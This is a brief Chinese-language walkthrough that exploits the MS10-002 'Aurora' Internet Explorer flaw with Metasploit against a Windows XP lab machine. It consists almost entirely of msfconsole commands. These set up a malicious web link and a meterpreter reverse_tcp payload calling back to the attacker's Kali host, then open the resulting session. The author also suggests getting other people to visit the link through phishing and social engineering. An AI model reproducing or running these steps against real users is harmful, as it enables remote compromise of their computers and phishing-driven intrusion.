一、環境說明
kali linux
靶機:xp
二、ms10_002漏洞利用
msf5 exploit(windows/smb/ms08_067_netapi) > search ms10_002_aurora
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/browser/ms10_002_aurora
msf5 exploit(windows/browser/ms10_002_aurora) > show options
設置srchost(自己kali的地址,讓目標主機連接)
msf5 exploit(windows/browser/ms10_002_aurora) > set srchost 192.168.244.128
srchost => 192.168.244.128 msf5 exploit(windows/browser/ms10_002_aurora) > set sevport 8080 sevport => 8080
設置meterpreter
msf5 exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
設置監聽地址(kali主機IP)
msf5 exploit(windows/browser/ms10_002_aurora) > set lhost 192.168.244.128
lhost => 192.168.244.128 msf5 exploit(windows/browser/ms10_002_aurora) > set lport 1123 lport => 1123 msf5 exploit(windows/browser/ms10_002_aurora) > show options
設置target(無需設置)
啟動
msf5 exploit(windows/browser/ms10_002_aurora) > run
如下圖所示:生成連接http://192.168.244.128:8080/EMoyg47 讓其他人訪問(釣魚、社工等等方式 讓別人訪問)
找個windows IE瀏覽器訪問(這里xp)
到kali查看是否建立會話(如下圖所示,成功連接會話)
測試,連接會話
msf5 exploit(windows/browser/ms10_002_aurora) > sessions -i 3